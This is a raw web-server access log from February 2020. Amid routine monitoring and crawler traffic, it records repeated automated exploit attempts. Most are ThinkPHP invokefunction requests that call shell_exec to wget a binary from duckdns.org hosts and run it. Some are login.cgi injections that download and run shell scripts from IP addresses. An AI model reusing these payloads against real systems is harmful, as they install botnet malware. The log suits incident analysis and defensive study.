212.91.246.72 - - [03/Feb/2020:13:08:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.246.163 - - [03/Feb/2020:13:08:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:13:09:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:10:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:11:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.52.1.61 - - [03/Feb/2020:13:12:53 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:14:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.248.108.6 - - [03/Feb/2020:13:14:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Feb/2020:13:15:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.211.10.10 - - [03/Feb/2020:13:15:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
177.12.245.22 - - [03/Feb/2020:13:15:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:13:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.93.244.236 - - [03/Feb/2020:13:16:52 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
66.249.79.206 - - [03/Feb/2020:13:17:31 +0100] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.206 - - [03/Feb/2020:13:17:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [03/Feb/2020:13:17:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.211.10.10 - - [03/Feb/2020:13:17:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
198.211.10.10 - - [03/Feb/2020:13:17:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
198.211.10.10 - - [03/Feb/2020:13:18:06 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
42.114.24.141 - - [03/Feb/2020:13:18:18 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:18:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.119.115.86 - - [03/Feb/2020:13:18:42 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:19:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.48.102.48 - - [03/Feb/2020:13:22:14 +0100] "GET /login.cgi?cli=aa%20aa%27;rm -rf /tmp/ff;wget%20http://158.69.236.40/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 404 310 "-" "DEMONS/2.0"
212.91.246.72 - - [03/Feb/2020:13:22:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.94.113.170 - - [03/Feb/2020:13:23:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
31.162.221.38 - - [03/Feb/2020:13:23:24 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
95.68.164.225 - - [03/Feb/2020:13:23:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:23:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:24:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:25:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:26:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.53.122.183 - - [03/Feb/2020:13:27:11 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:27:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.132.197.168 - - [03/Feb/2020:13:28:17 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:28:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.22.242.34 - - [03/Feb/2020:13:28:59 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:29:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:30:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.52.0.86 - - [03/Feb/2020:13:31:06 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
190.141.45.175 - - [03/Feb/2020:13:31:31 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
212.91.246.72 - - [03/Feb/2020:13:31:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.95.252 - - [03/Feb/2020:13:31:42 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:32:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:33:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.114.24.141 - - [03/Feb/2020:13:33:34 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:34:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.88.83.87 - - [03/Feb/2020:13:35:07 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:35:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:36:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:37:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.83.139.21 - - [03/Feb/2020:13:38:01 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
42.117.61.16 - - [03/Feb/2020:13:38:14 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
49.68.246.198 - - [03/Feb/2020:13:38:22 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.123.4.234/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Feb/2020:13:38:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.35.237.234 - - [03/Feb/2020:13:38:44 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:39:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.39.124.141 - - [03/Feb/2020:13:39:36 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
120.194.198.44 - - [03/Feb/2020:13:39:59 +0100] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
120.194.198.44 - - [03/Feb/2020:13:40:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
212.91.246.72 - - [03/Feb/2020:13:40:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.197.188 - - [03/Feb/2020:13:40:34 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:41:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:42:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.41.38.182 - - [03/Feb/2020:13:43:23 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
41.41.38.182 - - [03/Feb/2020:13:43:26 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:43:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.41.38.182 - - [03/Feb/2020:13:43:32 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
41.41.38.182 - - [03/Feb/2020:13:43:44 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
41.41.38.182 - - [03/Feb/2020:13:44:08 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
63.143.35.226 - - [03/Feb/2020:13:44:19 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
63.143.35.226 - - [03/Feb/2020:13:44:22 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [03/Feb/2020:13:44:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.131.122.29 - - [03/Feb/2020:13:44:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
117.1.81.20 - - [03/Feb/2020:13:44:56 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:45:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
63.143.35.226 - - [03/Feb/2020:13:45:54 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [03/Feb/2020:13:46:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:47:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.73.112.233 - - [03/Feb/2020:13:48:09 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:48:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
76.72.247.106 - - [03/Feb/2020:13:49:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
138.185.37.4 - - [03/Feb/2020:13:49:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:13:49:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:50:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:51:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:53:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:54:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.81.96.138 - - [03/Feb/2020:13:55:27 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:55:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:56:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:57:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.152.18.13 - - [03/Feb/2020:13:57:58 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:13:58:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:02:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:03:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.72.214.53 - - [03/Feb/2020:14:03:50 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
42.119.75.92 - - [03/Feb/2020:14:04:08 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:14:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.255 - - [03/Feb/2020:14:05:14 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
42.117.20.126 - - [03/Feb/2020:14:05:27 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:14:05:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:06:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:07:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:08:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:09:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:10:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:11:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.36.148.103 - - [03/Feb/2020:14:13:12 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.148.77 - - [03/Feb/2020:14:13:12 +0100] "GET /seiten/kontroll.htm HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
212.91.246.72 - - [03/Feb/2020:14:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.228.252.95 - - [03/Feb/2020:14:14:27 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:14:14:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:14:15:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.83.125.200 - - [03/Feb/2020:14:16:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:07 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:08 +0100] "POST /Admin53f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:32 +0100] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
